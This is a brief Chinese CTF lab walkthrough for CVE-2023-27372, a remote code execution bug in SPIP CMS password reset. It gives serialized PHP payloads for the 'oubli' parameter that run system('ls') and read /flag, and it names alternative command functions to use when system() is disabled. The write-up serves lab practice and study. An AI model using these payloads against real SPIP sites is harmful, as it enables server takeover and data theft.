CVE-2023-27372 SPIP cms V4
靶场介绍
SPIP CMS v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞
工具准备
- Burpsuite
靶场复现
1、开启环境后,访问链接,由题目可知,是SPIP远程代码执行漏洞,该漏洞存在密码重置功能中

点击Se connecter


可以找到该重置密码地址,随便输入邮箱进行抓包,根据公开信息,出现漏洞的参数为oubli,在此处构造Payload
Payload:
oubli=s:22:"<?php system('ls'); ?>";
- s -> 字符串格式
- 22 -> 长度
该长度是除冒号除外的(空格也算进去),如<?php system('ls'); ?>
OK,既然可以执行命令,那么可以寻找flag了。
查看根目录是否存在flag(一般都会放在根目录的):
oubli=s:24:"<?php system('ls /'); ?>";

OK,找到了,直接查看
oubli=s:29:"<?php system('cat /flag'); ?>";

总结
如果system()被禁用,还有shell_exec()、exec()、passthru()等。

浙公网安备 33010602011771号